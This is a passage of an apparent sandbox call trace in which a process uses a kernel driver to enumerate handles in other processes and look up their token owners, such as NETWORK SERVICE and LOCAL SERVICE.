(Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.323] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.323] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.323] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0159.323] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.323] PsAcquireProcessExitSynchronization () returned 0x0 [0159.323] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880051635d0) [0159.323] ObReferenceObjectByHandle (in: Handle=0x11c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0159.323] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.323] PsReleaseProcessExitSynchronization () returned 0x2 [0159.323] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x38 [0159.323] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003003044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003003044, ReturnLength=0xfffff88005163550) returned 0x0 [0159.323] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0159.323] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.323] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.323] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.324] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0159.324] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.324] PsAcquireProcessExitSynchronization () returned 0x0 [0159.324] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880051635d0) [0159.324] ObReferenceObjectByHandle (in: Handle=0x128, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0159.324] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.324] PsReleaseProcessExitSynchronization () returned 0x2 [0159.324] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x38 [0159.324] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa80030c1044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030c1044, ReturnLength=0xfffff88005163550) returned 0x0 [0159.324] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0159.324] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.324] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.324] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.324] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0159.325] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.325] PsAcquireProcessExitSynchronization () returned 0x0 [0159.325] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880051635d0) [0159.325] ObReferenceObjectByHandle (in: Handle=0x1ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003662600, HandleInformation=0x0) returned 0x0 [0159.325] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.325] PsReleaseProcessExitSynchronization () returned 0x2 [0159.325] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x38 [0159.325] ObQueryNameString (in: Object=0xfffffa8003662600, ObjectNameInfo=0xfffffa8003205044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003205044, ReturnLength=0xfffff88005163550) returned 0x0 [0159.325] ObfDereferenceObject (Object=0xfffffa8003662600) returned 0x1 [0159.325] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.325] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.325] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.325] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0159.325] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.325] PsAcquireProcessExitSynchronization () returned 0x0 [0159.325] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880051635d0) [0159.325] ObReferenceObjectByHandle (in: Handle=0x1b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80116ab630, HandleInformation=0x0) returned 0x0 [0159.325] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.325] PsReleaseProcessExitSynchronization () returned 0x2 [0159.326] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x38 [0159.326] ObQueryNameString (in: Object=0xfffffa80116ab630, ObjectNameInfo=0xfffffa80030d8044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030d8044, ReturnLength=0xfffff88005163550) returned 0x0 [0159.326] ObfDereferenceObject (Object=0xfffffa80116ab630) returned 0x2 [0159.326] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.326] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa1c) returned 0xc8 [0159.326] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0159.326] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80020d6060, HandleInformation=0x0) returned 0x0 [0159.326] ObOpenObjectByPointer (in: Object=0xfffffa80020d6060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0159.326] ObfDereferenceObject (Object=0xfffffa80020d6060) returned 0x41 [0159.326] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80022a7d00 | out: TokenHandle=0xfffffa80022a7d00*=0xc4) returned 0x0 [0159.326] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0159.326] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.326] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0159.326] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="NETWORK SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0159.329] CloseHandle (hObject=0xc4) returned 1 [0159.329] CloseHandle (hObject=0xc8) returned 1 [0159.329] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.329] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0159.329] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.329] PsAcquireProcessExitSynchronization () returned 0x0 [0159.329] KeStackAttachProcess (in: PROCESS=0xfffffa80020d6060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020d6060, ApcState=0xfffff880051635d0) [0159.329] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80019da070, HandleInformation=0x0) returned 0x0 [0159.329] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.329] PsReleaseProcessExitSynchronization () returned 0x2 [0159.330] ObfDereferenceObject (Object=0xfffffa80020d6060) returned 0x3f [0159.330] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030b4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030b4044, ReturnLength=0xfffff88005163508) returned 0x0 [0159.330] ObfDereferenceObject (Object=0xfffffa80019da070) returned 0x1 [0159.330] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.330] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.330] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.330] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0159.330] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.330] PsAcquireProcessExitSynchronization () returned 0x0 [0159.330] KeStackAttachProcess (in: PROCESS=0xfffffa80020d6060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020d6060, ApcState=0xfffff880051635d0) [0159.330] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ee3f20, HandleInformation=0x0) returned 0x0 [0159.330] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.330] PsReleaseProcessExitSynchronization () returned 0x2 [0159.330] ObfDereferenceObject (Object=0xfffffa80020d6060) returned 0x3f [0159.330] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa80030c0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030c0044, ReturnLength=0xfffff88005163508) returned 0x0 [0159.330] ObfDereferenceObject (Object=0xfffffa8001ee3f20) returned 0x1 [0159.330] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.331] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.331] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.331] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0159.331] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.331] PsAcquireProcessExitSynchronization () returned 0x0 [0159.331] KeStackAttachProcess (in: PROCESS=0xfffffa80020d6060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020d6060, ApcState=0xfffff880051635d0) [0159.331] ObReferenceObjectByHandle (in: Handle=0x104, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00135e760, HandleInformation=0x0) returned 0x0 [0159.331] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.331] PsReleaseProcessExitSynchronization () returned 0x2 [0159.331] ObfDereferenceObject (Object=0xfffffa80020d6060) returned 0x3f [0159.331] ObQueryNameString (in: Object=0xfffff8a00135e760, ObjectNameInfo=0xfffffa80030da044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030da044, ReturnLength=0xfffff88005163550) returned 0x0 [0159.331] ObfDereferenceObject (Object=0xfffff8a00135e760) returned 0x4 [0159.331] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.331] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.331] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.331] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0159.331] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.332] PsAcquireProcessExitSynchronization () returned 0x0 [0159.332] KeStackAttachProcess (in: PROCESS=0xfffffa80020d6060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020d6060, ApcState=0xfffff880051635d0) [0159.332] ObReferenceObjectByHandle (in: Handle=0x11c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0159.332] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.332] PsReleaseProcessExitSynchronization () returned 0x2 [0159.332] ObfDereferenceObject (Object=0xfffffa80020d6060) returned 0x3f [0159.332] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003004044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003004044, ReturnLength=0xfffff88005163550) returned 0x0 [0159.332] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0159.332] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.332] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.332] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.332] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0159.332] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.332] PsAcquireProcessExitSynchronization () returned 0x0 [0159.332] KeStackAttachProcess (in: PROCESS=0xfffffa80020d6060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020d6060, ApcState=0xfffff880051635d0) [0159.332] ObReferenceObjectByHandle (in: Handle=0x128, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0159.332] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.332] PsReleaseProcessExitSynchronization () returned 0x2 [0159.333] ObfDereferenceObject (Object=0xfffffa80020d6060) returned 0x3f [0159.333] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8002f9c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f9c044, ReturnLength=0xfffff88005163550) returned 0x0 [0159.333] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0159.333] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.333] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.333] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.333] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0159.333] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.333] PsAcquireProcessExitSynchronization () returned 0x0 [0159.333] KeStackAttachProcess (in: PROCESS=0xfffffa80020d6060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020d6060, ApcState=0xfffff880051635d0) [0159.333] ObReferenceObjectByHandle (in: Handle=0x1d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002197530, HandleInformation=0x0) returned 0x0 [0159.333] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.333] PsReleaseProcessExitSynchronization () returned 0x2 [0159.334] ObfDereferenceObject (Object=0xfffffa80020d6060) returned 0x3f [0159.334] ObQueryNameString (in: Object=0xfffffa8002197530, ObjectNameInfo=0xfffffa80030a8044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030a8044, ReturnLength=0xfffff88005163550) returned 0x0 [0159.334] ObfDereferenceObject (Object=0xfffffa8002197530) returned 0x1 [0159.334] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.334] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb40) returned 0xc8 [0159.334] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0159.334] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa800287e060, HandleInformation=0x0) returned 0x0 [0159.334] ObOpenObjectByPointer (in: Object=0xfffffa800287e060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0159.334] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4d [0159.334] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80022a7d00 | out: TokenHandle=0xfffffa80022a7d00*=0xc4) returned 0x0 [0159.334] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0159.335] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.335] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0159.335] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="LOCAL SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0159.337] CloseHandle (hObject=0xc4) returned 1 [0159.338] CloseHandle (hObject=0xc8) returned 1 [0159.338] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.338] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0159.338] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.338] PsAcquireProcessExitSynchronization () returned 0x0 [0159.338] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0159.338] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001e86f20, HandleInformation=0x0) returned 0x0 [0159.338] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.338] PsReleaseProcessExitSynchronization () returned 0x2 [0159.338] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0159.338] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030cb044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030cb044, ReturnLength=0xfffff88005163508) returned 0x0 [0159.338] ObfDereferenceObject (Object=0xfffffa8001e86f20) returned 0x1 [0159.338] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.339] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.339] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.339] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0159.339] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.339] PsAcquireProcessExitSynchronization () returned 0x0 [0159.339] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0159.339] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037a0a20, HandleInformation=0x0) returned 0x0 [0159.339] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.339] PsReleaseProcessExitSynchronization () returned 0x2 [0159.339] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0159.339] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa80024a07c4, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80024a07c4, ReturnLength=0xfffff88005163508) returned 0x0 [0159.339] ObfDereferenceObject (Object=0xfffffa80037a0a20) returned 0x1 [0159.339] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0159.340] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0159.340] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0159.340] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0159.340] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0159.340] PsAcquireProcessExitSynchronization () returned 0x0 [0159.340] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0159.340] ObReferenceObjectByHandle (in: Handle=0xd0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0159.340] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0159.340] PsReleaseProcessExitSynchronization () returned 0x2 [0159.340] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0159.340] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003034044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003034044, ReturnLength=0xfffff88005163550) returned 0x0 [0159.340] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0159.340] IofCompleteRequest 